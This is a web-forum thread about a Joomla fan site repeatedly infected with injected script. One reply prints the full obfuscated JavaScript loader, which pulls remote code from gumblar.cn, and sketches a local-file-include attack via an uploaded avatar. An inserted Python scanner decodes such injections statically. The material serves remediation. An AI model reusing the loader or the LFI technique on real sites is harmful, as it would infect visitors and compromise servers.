My site (omgitsfriends.com) has been hacked by the same person with an injection virus (or whatever it is, I'm not quite sure). Anyway, if you type "watch friends" or "watch friends online" into Google, you'll notice that you cannot go to the site through the search engine, which is about 85-90% of my traffic. I've cleaned up the code of the pages that were infected (or so I believe) and have submitted the site to Google for a review. I've had to do this before (for the same hack) and Google accepted the site and took off the bar from accessing my site. However, now no matter what I seem to do (with cleaning the badware) I can't get that bar lifted from the search engine. What can I do to fix this?
Google probably did not keep your request this time because your site still contains a Trojan (detected by my antivirus). Try moving to a better hosting provider.
You need to clean and secure your site 100%. If you keep cleaning the malicious code from your pages and don't patch the initial security hole which the attackers are using to infect your site, your content will only get infected again and again.
Right, I clean the malicious code, but I do not know how to patch the initial security hole, which is what I'm posting here asking for. Does anybody know how to do this? I assume you do SSANZ by looking at your signature. Please PM me if you are able to fix this. Thanks.
I would need to see if the dodgy code is similar to what I had to deal with a few weeks ago, but mine was FTP related (throwing the same warnings though). Hence, I had to change all my FTP passwords and then remove the dodgy code. It was a complete pain but fairly straightforward. It was on my dev server though, so I had loads of crap to clean up. Hope that helps, Nigel
Hi, how does this hacking take place? How can we come to know about this hacking? What steps can be followed to avoid this hacking? Could you please let me know?
Remove the following code:
<script language=javascript><!-- (function(K2v0){var aaIoW='%';var Na2r=('>76>61r>20a>3d>22>53c>72>69p>74Engin>65>22>2cb>3d>22V>65r>73>69on()+>22>2c>6a>3d>22>22>2cu>3dnav>69>67ator>2euserAge>6et>3bif((>75>2e>69ndex>4ff>28>22>57in>22)>3e0>29>26>26(u>2eind>65xOf>28>22NT>206>22)>3c0)>26>26(d>6fcument>2ecook>69e>2ei>6edexOf>28>22>6diek>3d1>22)>3c0>29>26>26(t>79>70>65of(z>72>76>7a>74s)>21>3dtypeof(>22>41>22))>29>7bzrv>7ats>3d>22A>22>3beva>6c>28>22if(window>2e>22+a+>22)j>3dj+>22+a+>22Maj>6fr>22+b+a+>22Mino>72>22>2b>62+a+>22Build>22>2b>62+>22j>3b>22)>3bdo>63ument>2ew>72i>74e(>22>3cs>63ript>20s>72>63>3d>2f>2fgumblar>2ecn>2f>72ss>2f>3fid>3d>22+j+>22>3e>3c>5c>2fscript>3e>22)>3b>7d').replace(K2v0,aaIoW);eval(unescape(Na2r))})(/>/g); --></script>
Located on lines 29-31 of your index. Check if this code has been injected on any other page, and try to see if any new folders/files have popped up recently. Also, update the vulnerable services that led to being compromised in the first place. PS: Your site was likely breached due to its local file include vulnerability:
http://www.omgitsfriends.com/index.php/<local path here>
They've likely signed up and uploaded an image (likely an avatar) with injected code in it. Viewing this image via LFI will execute it, thus executing the attacker's code! Good luck!
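
A static check for the wrapper quoted in the post above, added here as an example (not part of the original thread): it decodes the string the way the script would, without executing anything, and walks a web root to list other infected files. The function names, the file extensions and the sample page are assumptions; the sample is constructed and points at example.invalid.

```python
import os
import re
from urllib.parse import unquote

# Shape of the injected wrapper quoted in the post:
# (function(A){var B='%';var C=('<body>').replace(A,B);eval(unescape(C))})(/<marker>/g);
WRAPPER = re.compile(
    r"\(function\((\w+)\)\{var (\w+)='(.)';var (\w+)=\('(.*?)'\)"
    r"\.replace\(\1,\2\);eval\(unescape\(\4\)\)\}\)\(/(.+?)/g\)", re.S)
SRC_HOST = re.compile(r"src=[\"']?(?:https?:)?//([\w.-]+)")

def decode_injections(text):
    """Return the decoded payload of every wrapper found; nothing is executed."""
    out = []
    for m in WRAPPER.finditer(text):
        pct, body, marker = m.group(3), m.group(5), m.group(6)
        # Assumption: the /marker/g argument is a literal string, as in the post.
        out.append(unquote(body.replace(marker, pct), encoding="latin-1"))
    return out

def remote_hosts(decoded):
    """Hosts the decoded payload would load scripts from (for blocking/log search)."""
    return SRC_HOST.findall(decoded)

def scan_tree(root, exts=(".php", ".html", ".htm", ".js", ".tpl")):
    """Map each infected file under root to its decoded payloads."""
    hits = {}
    for folder, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as fh:
                    found = decode_injections(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample page: same wrapper shape, harmless body, placeholder host.
SAMPLE = (
    "<html><body>ok</body><script language=javascript><!-- "
    "(function(Qx1){var zz='%';var Pp=('do>63ument>2ewrite(>22>3cscript src>3d//"
    "example>2einvalid/x>2ejs>3e>3c>5c/script>3e>22)')"
    ".replace(Qx1,zz);eval(unescape(Pp))})(/>/g); --></script></html>")

if __name__ == "__main__":
    for payload in decode_injections(SAMPLE):
        print(payload, remote_hosts(payload))
```

Run `scan_tree()` against a copy of the web root after every cleanup; a file that reappears in the result means the entry point is still open.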
SSANZ above not only didn't fix my site(s), but he also never refunded me. He stopped answering support tickets and stopped signing online (could've blocked me from MSN). Either way, while I wait for my refund, is there anybody who is competent enough to take the job and actually get it done? This isn't something that should take weeks. I recommend if you have a security issue NOT to use SSANZ.net
Not really related to the initial question, but to the complaints about SSANZ. The guy was completely hacked and all his systems removed/deleted by the anti-sec group. http://lists.virus.org/full-disclosure-0907/msg00031.html Scary stuff and he is probably going to take a while to reply back.
Thanks everybody for your feedback. thewebhostingdir -- All of this has been changed and only 2 IPs are currently allowed to access the site's FTP. Unfortunately, this is still occurring. I'm still in need of a trustworthy person/company to fix this for me. I was scammed out of $120 by SSANZ, so still looking for some help. Please PM me if you can fix this. Keep in mind, the site is running on Joomla.